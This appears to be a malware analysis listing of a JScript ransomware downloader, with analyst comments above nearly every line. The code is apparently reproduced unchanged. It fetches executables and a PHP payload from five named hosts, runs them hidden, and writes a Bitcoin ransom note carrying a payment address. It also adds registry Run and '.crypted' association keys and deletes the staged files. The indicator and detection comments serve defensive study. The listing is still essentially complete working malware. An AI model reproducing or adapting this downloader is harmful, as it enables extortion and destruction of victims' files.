// Configuration and COM objects for a Windows Script Host (JScript) downloader that
// stages a file-encrypting payload and writes a ransom note.
// Analyst annotations only; every code line is unchanged from the paste.
// Indicators visible here: five HTTP hosts, the '/counter/' URL path used later,
// and the staging paths %TEMP%\a* and %TEMP%\php4ts.dll.
// 'id' is sent as the 'id=' query parameter of every download request; its meaning
// to the server is not visible here (presumably a victim/campaign token).
- var id = 'LXD8ChCoeaXvY0jiabUiGD45YojpwUx-mun3rI1oJa-5Ynt8IbxuB7dQ42NDbOSrK4RRYlBr7fA-';
// 'ad' is sent as the 'ad=' query parameter and is printed in the note as the
// Bitcoin address to pay.
- var ad = '15nUMTVJLKYo27GgWbovLHA8DidAx6jvqm';
// Ransom amount in BTC, interpolated into the note text.
- var bc = '0.47531';
// Index of the host that last delivered a payload; later passes start from it.
- var ld = 0;
// cq = double quote (char 34), cs = backslash (char 92); building them at runtime
// keeps literal quotes and backslashes out of the command strings assembled below.
- var cq = String.fromCharCode(34);
- var cs = String.fromCharCode(92);
// Hosts contacted over plain HTTP for the payload stages and listed in the note as
// "decryptor" links. Whether they are attacker-owned or compromised third-party
// sites cannot be told from this listing.
- var ll = [
- 'dicsom.com',
- 'pticemir.ru',
- 'www.trucklogist.ru',
- 'collegembip.com',
- 'retailrzn.ru'
- ];
// WScript.Shell: environment expansion and process launch.
- var ws = WScript.CreateObject('WScript.Shell');
// fn = %TEMP%\a, the base name for every dropped file (a1.exe, a2.exe, a.exe, a.php, a.txt).
- var fn = ws.ExpandEnvironmentStrings('%TEMP%') + cs + 'a';
// pd = %TEMP%\php4ts.dll, a DLL dropped next to a.exe. The file name suggests a
// PHP 4 runtime library -- inferred from the name only, confirm against the binary.
- var pd = ws.ExpandEnvironmentStrings('%TEMP%') + cs + 'php4ts.dll';
// XMLHTTP performs the downloads, ADODB.Stream writes the binary responses to disk,
// FileSystemObject handles the existence checks and the text note.
- var xo = WScript.CreateObject('Msxml2.XMLHTTP');
- var xa = WScript.CreateObject('ADODB.Stream');
- var fo = WScript.CreateObject('Scripting.FileSystemObject');
// Main routine. Analyst annotations only; every code line is unchanged.
// Stage 1 downloads up to five files from the host list. Stage 2 runs only if the
// three required files exist: it writes the ransom note, registers it in the registry,
// runs the payload, then removes the staged files.
// Behaviours useful for detection: a script host issuing HTTP GETs to '/counter/?ad=',
// executables written to %TEMP% and launched from there, 'REG ADD' against the HKCU
// Run key and HKCR\.crypted, and DECRYPT.txt appearing on the desktop.
// The encryption itself is not in this listing; it presumably happens in the
// downloaded a.php run by a.exe -- confirm against those files.
// Run-once guard: the note file %TEMP%\a.txt doubles as the "already executed" marker.
- if (!fo.FileExists(fn + '.txt')) {
// Five passes (n), one file per pass; each pass walks the hosts starting at the
// last host that served a payload (ld).
- for (var n = 1; n <= 5; n++) {
- for (var i = ld; i < ll.length; i++) {
// dn flags that this host returned an accepted payload on this pass.
- var dn = 0;
- try {
// Synchronous GET (third argument false). 'rnd' is the string concatenation of the
// host index and the pass number, e.g. i=0, n=1 gives '01'.
- xo.open('GET', 'http://' + ll[i] + '/counter/?ad=' + ad + '&id=' + id + '&rnd=' + i + n, false);
- xo.send();
- if (xo.status == 200) {
- xa.open();
// type = 1 selects binary mode for the stream.
- xa.type = 1;
- xa.write(xo.responseBody);
// Only responses larger than 1000 bytes are accepted; the size is the only check made.
- if (xa.size > 1000) {
- dn = 1;
- if (n <= 2) {
// Passes 1 and 2: saved as %TEMP%\a1.exe / a2.exe (option 2 = overwrite) and run
// at once in a normal window without waiting. Their purpose is not visible here.
- xa.saveToFile(fn + n + '.exe', 2);
- try {
- ws.Run(fn + n + '.exe', 1, 0);
- } catch (er) {
// util_log and _inspect are not defined in this listing; presumably they were
// inserted by the deobfuscation or sandbox tooling that produced this paste.
- util_log('>>> Silencing catch ' + _inspect(er));
- }
- ;
- } else if (n == 3) {
// Pass 3: %TEMP%\a.exe, later invoked with a.php as its argument.
- xa.saveToFile(fn + '.exe', 2);
- } else if (n == 4) {
// Pass 4: %TEMP%\php4ts.dll.
- xa.saveToFile(pd, 2);
- } else if (n == 5) {
// Pass 5: %TEMP%\a.php, the script handed to a.exe.
- xa.saveToFile(fn + '.php', 2);
- }
- }
- ;
- xa.close();
- }
- ;
// Remember the host that worked and move on to the next pass.
- if (dn == 1) {
- ld = i;
- break;
- }
- ;
- } catch (er) {
// Request or stream errors are swallowed, so the loop falls through to the next host.
- util_log('>>> Silencing catch ' + _inspect(er));
- }
- ;
- }
- ;
- }
- ;
// Stage 2 is gated on a.exe, php4ts.dll and a.php all being present.
// a1.exe and a2.exe are neither checked here nor deleted at the end.
- if (fo.FileExists(fn + '.exe') && fo.FileExists(pd) && fo.FileExists(fn + '.php')) {
// Write the ransom note to %TEMP%\a.txt. The note's claims (RSA-1024, the 3-day
// deadline) are the author's text and cannot be verified from this listing.
- var fp = fo.CreateTextFile(fn + '.txt', true);
- fp.WriteLine('ATTENTION!');
- fp.WriteLine('');
- fp.WriteLine('All your documents, photos, databases and other important personal files');
- fp.WriteLine('were encrypted using strong RSA-1024 algorithm with a unique key.');
- fp.WriteLine('To restore your files you have to pay ' + bc + ' BTC (bitcoins).');
- fp.WriteLine('Please follow this manual:');
- fp.WriteLine('');
- fp.WriteLine('1. Create Bitcoin wallet here:');
- fp.WriteLine('');
- fp.WriteLine(' https://blockchain.info/wallet/new');
- fp.WriteLine('');
- fp.WriteLine('2. Buy ' + bc + ' BTC with cash, using search here:');
- fp.WriteLine('');
- fp.WriteLine(' https://localbitcoins.com/buy_bitcoins');
- fp.WriteLine('');
- fp.WriteLine('3. Send ' + bc + ' BTC to this Bitcoin address:');
- fp.WriteLine('');
- fp.WriteLine(' ' + ad);
- fp.WriteLine('');
- fp.WriteLine('4. Open one of the following links in your browser to download decryptor:');
- fp.WriteLine('');
// The "decryptor" links reuse the download hosts with an 'a=' parameter.
- for (var i = 0; i < ll.length; i++) {
- fp.WriteLine(' http://' + ll[i] + '/counter/?a=' + ad);
- }
- ;
- fp.WriteLine('');
- fp.WriteLine('5. Run decryptor to restore your files.');
- fp.WriteLine('');
- fp.WriteLine('PLEASE REMEMBER:');
- fp.WriteLine('');
- fp.WriteLine(' - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.');
- fp.WriteLine(' - Nobody can help you except us.');
- fp.WriteLine(' - It`s useless to reinstall Windows, update antivirus software, etc.');
- fp.WriteLine(' - Your files can be decrypted only after you make payment.');
- fp.WriteLine(' - You can find this manual on your desktop (DECRYPT.txt).');
- fp.Close();
// The registry and copy commands below run through %COMSPEC% in a hidden window
// (style 0) without waiting.
// HKCU Run value 'Crypted' is set to the note path, presumably so the note is
// opened at every logon.
- ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCU' + cs + 'SOFTWARE' + cs + 'Microsoft' + cs + 'Windows' + cs + 'CurrentVersion' + cs + 'Run' + cq + ' /V ' + cq + 'Crypted' + cq + ' /t REG_SZ /F /D ' + cq + fn + '.txt' + cq, 0, 0);
// File association: '.crypted' maps to class 'Crypted', whose open command is
// notepad.exe with the note, so opening any .crypted file displays the note.
- ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCR' + cs + '.crypted' + cq + ' /ve /t REG_SZ /F /D ' + cq + 'Crypted' + cq, 0, 0);
- ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCR' + cs + 'Crypted' + cs + 'shell' + cs + 'open' + cs + 'command' + cq + ' /ve /t REG_SZ /F /D ' + cq + 'notepad.exe ' + cs + cq + fn + '.txt' + cs + cq + cq, 0, 0);
// The note is copied as DECRYPT.txt to two candidate desktop locations.
- ws.Run('%COMSPEC% /c copy /y ' + cq + fn + '.txt' + cq + ' ' + cq + '%AppData%' + cs + 'Desktop' + cs + 'DECRYPT.txt' + cq, 0, 0);
- ws.Run('%COMSPEC% /c copy /y ' + cq + fn + '.txt' + cq + ' ' + cq + '%UserProfile%' + cs + 'Desktop' + cs + 'DECRYPT.txt' + cq, 0, 0);
// Runs a.exe with a.php as its argument, hidden, and waits for it to finish
// (third argument 1). This is the only blocking call in the script.
- ws.Run('%COMSPEC% /c ' + fn + '.exe ' + cq + fn + '.php' + cq, 0, 1);
// The note is shown to the user once the payload has returned.
- ws.Run('%COMSPEC% /c notepad.exe ' + cq + fn + '.txt' + cq, 0, 0);
// a.php is overwritten with 1000 lines of the address string before deletion,
// so the script text cannot be recovered from the file's final contents.
- var fp = fo.CreateTextFile(fn + '.php', true);
- for (var i = 0; i < 1000; i++) {
- fp.WriteLine(ad);
- }
- ;
- fp.Close();
// Cleanup: a.php, a.exe and php4ts.dll are deleted. The note, both DECRYPT.txt
// copies and the registry values stay behind as artefacts.
- ws.Run('%COMSPEC% /c DEL ' + cq + fn + '.php' + cq, 0, 0);
- ws.Run('%COMSPEC% /c DEL ' + cq + fn + '.exe' + cq, 0, 0);
- ws.Run('%COMSPEC% /c DEL ' + cq + pd + cq, 0, 0);
- }
- ;
- }
- ;